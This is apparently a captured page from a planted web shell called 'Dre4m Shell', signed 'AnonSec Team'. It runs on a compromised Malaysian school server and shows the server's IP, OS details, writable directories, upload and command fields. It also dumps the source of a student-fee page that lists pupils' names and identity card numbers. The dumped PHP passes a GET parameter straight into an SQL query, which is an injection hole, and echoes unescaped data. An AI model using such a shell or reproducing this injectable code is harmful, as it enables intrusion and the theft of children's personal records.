Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 13.58.200.78
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/smsmalor/smsmalorsetar.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/smsmalor/smsmalorsetar.com/semak_data_yuran.php
<?php require_once('Connections/mentorpbs.php'); ?>


<?php
    if (!isset($_SESSION)) {
      session_start();
    }
    $MM_authorizedUsers = "";
    $MM_donotCheckaccess = "true";

    // *** Restrict Access To Page: Grant or deny access to this page
    function isAuthorized($strUsers, $strGroups, $UserName, $UserGroup) { 
      // For security, start by assuming the visitor is NOT authorized. 
      $isValid = False; 

      // When a visitor has logged into this site, the Session variable MM_Username set equal to their username. 
      // Therefore, we know that a user is NOT logged in if that Session variable is blank. 
      if (!empty($UserName)) { 
        // Besides being logged in, you may restrict access to only certain users based on an ID established when they login. 
        // Parse the strings into arrays. 
        $arrUsers = Explode(",", $strUsers); 
        $arrGroups = Explode(",", $strGroups); 
        if (in_array($UserName, $arrUsers)) { 
          $isValid = true; 
        } 
        // Or, you may restrict access to only certain users based on their username. 
        if (in_array($UserGroup, $arrGroups)) { 
          $isValid = true; 
        } 
        if (($strUsers == "") && true) { 
          $isValid = true; 
        } 
      } 
      return $isValid; 
    }



    $MM_restrictGoTo = "../login_semakanyuran.php";
    if (!((isset($_SESSION['MM_Username'])) && (isAuthorized("",$MM_authorizedUsers, $_SESSION['MM_Username'], $_SESSION['MM_UserGroup'])))) {   
      $MM_qsChar = "?";
      $MM_referrer = $_SERVER['PHP_SELF'];
      if (strpos($MM_restrictGoTo, "?")) $MM_qsChar = "&";
      if (isset($QUERY_STRING) && strlen($QUERY_STRING) > 0) 
      $MM_referrer .= "?" . $QUERY_STRING;
      $MM_restrictGoTo = $MM_restrictGoTo. $MM_qsChar . "accesscheck=" . urlencode($MM_referrer);
      header("Location: ". $MM_restrictGoTo); 
      exit;
    }

    

?>


<?php

    $colname_Recordset_kelas22 = "-1";
    if (isset($_GET['list_kelas'])) {
      $colname_Recordset_kelas22 = $_GET['list_kelas'];
    }
    mysqli_select_db($mentorpbs,$database_mentorpbs);
    $query_Recordset_kelas22 = "SELECT * FROM yuran_murid WHERE namakelas = '$colname_Recordset_kelas22' ORDER BY namamurid ASC";
    $Recordset_kelas22 = mysqli_query($mentorpbs,$query_Recordset_kelas22) or die(mysqli_error());
    $row_Recordset_kelas22 = mysqli_fetch_assoc($Recordset_kelas22);
    $totalRows_Recordset_kelas22 = mysqli_num_rows($Recordset_kelas22);
?>

<?php require_once('Connections/mentorpbs.php'); ?>
<?php
    $currentPage = $_SERVER["PHP_SELF"];

    $queryString_Recordset_kelas22 = "";
    if (!empty($_SERVER['QUERY_STRING'])) {
      $params = explode("&", $_SERVER['QUERY_STRING']);
      $newParams = array();
      foreach ($params as $param) {
        if (stristr($param, "pageNum_Recordset_kelas22") == false && 
            stristr($param, "totalRows_Recordset_kelas22") == false) {
          array_push($newParams, $param);
        }
      }
      if (count($newParams) != 0) {
        $queryString_Recordset_kelas22 = "&" . htmlentities(implode("&", $newParams));
      }
    }
    $queryString_Recordset_kelas22 = sprintf("&totalRows_Recordset_kelas22=%d%s", $totalRows_Recordset_kelas22, $queryString_Recordset_kelas22);
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title></title>

        <style type="text/css">
        <!--
        .style1 {
          font-size: 24px;
          color: #0000FF;
        }

		.style3 {color: #0000FF}

        .header {
                padding: 0px 0px;
            }

            .content {
                padding: 16px;
            }

            .sticky {
                position: fixed;
                top: 0;
                width: 100%;
            }

            .sticky + .content {
                padding-top: 102px;
            }

			div {
				width:100%;
				height:auto;
			}
			
        -->
        </style>

    </head>

    <body>

        <!-- ***** bind header to freeze id -->
        <div class="header" id="myHeader">
            <?php include('smheader03_yuran.php') ?>
        </div>    
 
        <!-- ***** Kandungan akan skrol -->
        <div class="content">


        <div align="center" class="style1">MAKLUMAT PEMBAYARAN YURAN MURID</div>
        <p>&nbsp;</p>

        <p align="center" class="style1">PENGGUNA: 
		<?php
		echo "- " , $_SESSION['MM_Username'];
		echo "- " , $_SESSION['MM_Jawatan'];		
		?>


        <form id="form1" name="form1" method="get" action="">
            <label>
                <div align="center">
                    
					<select name="list_kelas" id="list_kelas" style="width: 100px;">
						<option value="-" selected="selected">-</option>
					
					<?php
					
						mysqli_select_db($mentorpbs,$database_mentorpbs);
						$query_Recordset_kelas = "SELECT * FROM kelas_22";
						$Recordset_kelas = mysqli_query($mentorpbs,$query_Recordset_kelas) or die(mysqli_error());
						

						while ($row_Recordset_kelas = mysqli_fetch_assoc($Recordset_kelas)) {
							
					?>
								<option value = "<?php echo $row_Recordset_kelas['namakelas']; ?>">
								<?php echo $row_Recordset_kelas['namakelas']; ?>
								</option>
								
								
								
					<?php
																								}
					?>
						
                    </select>					

					
                    <label>
                        <input type="submit" name="button_cari" id="button_cari" value="CARI KELAS" />
                    </label>
                </div>
            </label>
        
        </form>





        <p align="center" class="style1">SENARAI NAMA MURID
		<?php
		echo "- " , $colname_Recordset_kelas22;
		
		?>
 		
        <!-- ***** Kandungan akan skrol -->
        <div class="content">

        <table border="1" align="center">
            <tr>
                <td width="15">
                    <div align="center" class="style3">BIL</div>
                </td>

                <td width="15">
                    <div align="center" class="style3">ID MURID</div>
                </td>

                <td width="20">
                    <div align="center"><span class="style3">KELAS</span></div>
                </td>

                <td width="300">
                    <div align="center"><span class="style3">NAMA MURID</span></div>
                </td>
				
                <td width="150">
                    <div align="center"><span class="style3">NO KAD PENGENALAN</span></div>
                </td>				

                <td width="150">
                    <div align="center"><span class="style3">NOMBOR RESIT YURAN PIBG</span></div>
                </td>		

                <td width="150">
                    <div align="center"><span class="style3">TARIKH RESIT YURAN PIBG</span></div>
                </td>	

                <td width="150">
                    <div align="center"><span class="style3">NOMBOR RESIT MAJALAH</span></div>
                </td>

                <td width="150">
                    <div align="center"><span class="style3">TARIKH RESIT MAJALAH</span></div>
                </td>						

                <td width="150">
                    <div align="center"><span class="style3">Catatan</span></div>
                </td>
				
            </tr>

            <?php do { ?>

                          <tr>
								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['bil']; ?></div>
								</td>
								
								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['idmurid']; ?></div>
								</td>								

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['namakelas']; ?></div>
								</td>

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['namamurid']; ?></div>
								</td>

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['nokp']; ?></div>
								</td>
								
								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['noresitpibg']; ?></div>
								</td>

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['tarikhresitpibg']; ?></div>
								</td>

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['noresitmajalah']; ?></div>
								</td>								

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['tarikhresitmajalah']; ?></div>
								</td>

								<td>
									<div align="center"><?php echo $row_Recordset_kelas22['catatan']; ?></div>
								</td>
                    
				          </tr>

                          <?php } while ($row_Recordset_kelas22 = mysqli_fetch_assoc($Recordset_kelas22)); ?>
        
        </table>
		
        <div align="center"><br />
			<?php echo $totalRows_Recordset_kelas22 ?> Records Total </div>

        </div>
        <!-- Skrol kandungan -->		

			<p align="center">
				<button onclick="window.print();" class="noPrint">
					CETAK
				</button>
			</p>		
		
			<p align="center">
			<p align="center"><a href="logout_yuran.php">KEMBALI</a>

		</div>

    </body>

    <!-- Script to execute freeze -->
    <script>
        window.onscroll = function() {myFunction()};

            var header = document.getElementById("myHeader");
            var sticky = header.offsetTop;

            function myFunction() {
                if (window.pageYOffset > sticky) {
                                                    header.classList.add("sticky");
                                                } else {
                                                        header.classList.remove("sticky");
                                                        }
                                    }
    </script>

</html>

<?php
    mysqli_free_result($Recordset_kelas22);
?>

Anon7 - 2022
AnonSec Team